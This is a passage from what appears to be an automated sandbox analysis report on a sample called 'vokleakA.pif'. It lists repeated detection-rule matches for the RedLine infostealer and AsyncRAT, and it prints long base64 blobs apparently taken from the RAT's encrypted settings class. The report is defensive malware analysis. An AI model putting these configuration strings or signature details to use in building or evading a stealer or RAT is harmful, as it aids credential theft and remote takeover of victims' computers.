              Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000007.00000002.2219281239.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000009.00000002.2320481183.0000000031EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, v9Lsz.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, VFo.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, 5FJ0H20tobu.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, NtdoTGO.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, XBsYgp.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, AwxUa2Na.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, 19C9FfZ.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, 19C9FfZ.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, soCD8XkwU.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, soCD8XkwU.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, Settings.csBase64 encoded string: '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
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, Settings.csBase64 encoded string: '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
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, Settings.csBase64 encoded string: 'S/fftHEcsfxVsqQQROVtTy1L0wQ6eWKjbQN0zDKX36Yg82kXB7LSMeOUpEltZonn1nQYfsIxLpQiTZCJmP5bWA==', 'zSnvAechm2QecynFDQDglNKUpDr1XVANZggjoQu8dw7GM1FhEgNkhxDPGQMOt5y/UYF5gcbWnu9EcKh2Z8qeVQ==', 'K35RAxAkLGYt8n0kIohOnZnuOuGxlmonxt6Irja7L7pPxTucHpUnjqEzyLcpGl/+EyMOTXoqS3M30hwOBp3eCg==', 'q+rZ+pF6vEFGf+/sNsqNZcwb1jmIRbMYLXyM8FOM02alTuZ/B1rraOiFhohgZi0pbc2KaJ6hUw8lb9oliDzl0g==', 'z99oHKnRLBWI3zRJFX6I1KqmtH8dY+CXESIG6X6yu4otkTMTNiJ36O2zco8xzqa44bAjO2sAwihOVfLWEhPg4Qp2bXsnCimY/V+oHKlxLStvDk4BtHBXtv5BjHTVKcc1LXgjhZkd5dSt3vcTTAy5u2+txX8evjglETehx/NfPVfSxyJOVERPFT7rYHvSjytF3mLW7XLfyzsR0PoM3Mt00jm5Xbh0PrNejQ2FVsoz3waWCKlvvS7PcLuLLKYS8OasCqr7L6geMqpttdgS/7uDbXrRNjLCZs9JwBUQLAPVFibU/EUGwUg2oxIgUHw4aoEwcixR3q/97BfLzhpzJILbkurefknfO4eqVNdcO72pyjh7NpNtrGXY27H02aN368jbAwhEYhUu+L3AGdMRkWOj+WSpW2zy6h8qldjgdz0ffypYpgixU8eA+IkqKxdZ18+plpGbqKNx3EWt8uuQjKIDgu7AmP8PThB6hDBoGhpc3GdHqHqlBU+iIay7gHFtfop3VjXLiBrQSehx8fSDfuOIpFQOa8BrFQTDNU2xqM8LAKdbNVGGQKx+JMJr52CfIMfC4yNoS0sdS5R1InYtzHJiHpP7LBsSI2XzZCQQaAGwdFCmaqsMTp14slVJfstVHo2lrjIGjJNd4HWo8PenwOaZwzw+1Fc1paTlbeaFjmYivdjX61GVytJIxjrh8g19msaqVFn1jTBCnKCplMF8JhOKdHqmRmGyLuKWNCHl95RxjibGSj4JXxRlnTQXjRj5gYGEwYFTVpegOsPnjGXLVVfYERJs0H0SIuQm1N9AjsxtKLDYoS0+r7rTrtQA/rGJJK5KcVAdRyMRiIYvybIAvvPx6gB2OlRNDn6ExxKvPRtv3tX8T3D+c8CQJElvjM64G8XEsgdKA0NDUTfYlO6crYPKMKmyKeEUFhPQ+aZZsumxKss57YWlQeP5mZjkoCyswY+fCHh60X/wHJg4r/yg0ipAcLm84Pqrxz48EOh12gDlkborOO/32jVzdD3Fxb84AX6V+CZSB7uEOKn9YpF/kusZK6jYsZNIA6oKeDv+2on41PuatDR2s8lsPlWx6oL1gQOV8x/WMfSYwDv5WuTjhQv+9egMg+MIYcqXNZXu3vWvd3bO7Ib5w3CTPLt5RvOMwI8RNmETK6FBLj4H3JaKnRxh0lT0RXwAeYVHpxpEzoUHHoVeqBbqVpSYjp96Vd6BKIDwSh/5izCHRDLFEkr2jkLnSkvcwijkwAt0BzkPvbAEEUJiSY5gfxb9AVJgrGEQdsNKJVgns1Xujvj+VVv6I6IEch8qrO0Z8rpGcMpH+Snz91AZG5h7nUfKySwwB0U9G74Q/Jv87rgEa8/ArvlVl3iv9azQakimedJ6dfqeAuF5wNrPGvX+yfMpWy2QEY3Qpm1gqAsaphWw13uJttdrWf6Yet1aO8rN69DdYme1er2ZXios4BTnxlmjRqMgiXAncLxLCN5kyar8bUVXTIWo/EaUNn1z3qDkXYbTHV0PMwcQd21KwefcuiL/LWjkS6DKzswGZHcgVO+sEBDYxJmDJnLszJ0rc9cOZWrCpggdJSzzrlj+LmiKA4lWNfx8VSA6YLvloo63Sam28phT8TNadtGHZ3mBpe2bLJhRZo5q0tVXCA3brkJgXmSiqIU6tt2/UH4UAzJ2LQdEuFkzmuPZ4RKYDJCrZ3QX75rKw+Y8sI8Z3ciLnY1QQw6Pi7L64n3pmOmSt85rovyceFgQanO8PCL9VeMk0JDkWR1k7Znm4AaMqEHZJJEAqWYcRr9gxO0hlt2Z+q4uBwgHFtSi6tTtkywxZJHXQwtmCyOS+wA49ZhQCW1WU++cOHv+21XmefUy0qB055ZLSLKNx3R8h325snhCiLrdlCUdQu6JBwUiSD/pBmyYKB//00+kYfu4ZlrcFgao6pwUK/AW3dMJprN85eHEO1lPpCTQrdiVGgTL9/k8nvZ+yzF2iDfepVWSjRtf1DUn1aVbplyWYsSbCzNv56he2FK54MW/R3LdA8aoz7yOn6LY13fe629sXBiB+zAP8mKYRcva6cuPWngobVRgIi1dAarwE8A+dOpnJ115UGx0jtO1HOa+LjbqB5u/rqKLKaaeaRF2w7HuuzA1HoD7CLzOB3qorzV1Lql9/H4FFy2zY7S9kqe9VuZGjMc2hJTCjauCGSBu+0W5OGQVhZDTq7xbhk0ia3fIiT+gRFkePK7Y9w9RVLCsem36RcbaYnJDUTq0LE5iT7O/oNWJTP9LNLxaMzIX9IGRexxxAR5DdcwxXZsqv+xl2qmXsb9tjvmAEOGtvRmcTJ5DbO3bIPtVtbbQU7ysDotVkDOuSpSHPVlIYHQ=', 'TR9X/Vnsl+hzM+e5nhNmmlBy1ADQPwc/gSTtlPixb3Jhwl75jute4CIDxmk4rJrn2ZfJVfhckqw51eybBdSs0bb1Tc9P8o5ekPCBgMoloce6BtlYQC0Q5sLMeZ8IZRaZkKfVBvrLcM9M2IMSmWdXXvIsIK3L3jNT1nfIUBA7GEO6NixQDlmyfKlfsUdag5aqdbeeqho6PKokSEx4L1nvXD6ylxZMlj58zon/Q09L34OVhe8bGGG+eZEc8OEP7U9bvmw+2TRmzZqjuGCvO+eWsF3
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, Settings.csBase64 encoded string: 'S/fftHEcsfxVsqQQROVtTy1L0wQ6eWKjbQN0zDKX36Yg82kXB7LSMeOUpEltZonn1nQYfsIxLpQiTZCJmP5bWA==', 'zSnvAechm2QecynFDQDglNKUpDr1XVANZggjoQu8dw7GM1FhEgNkhxDPGQMOt5y/UYF5gcbWnu9EcKh2Z8qeVQ==', 'K35RAxAkLGYt8n0kIohOnZnuOuGxlmonxt6Irja7L7pPxTucHpUnjqEzyLcpGl/+EyMOTXoqS3M30hwOBp3eCg==', 'q+rZ+pF6vEFGf+/sNsqNZcwb1jmIRbMYLXyM8FOM02alTuZ/B1rraOiFhohgZi0pbc2KaJ6hUw8lb9oliDzl0g==', 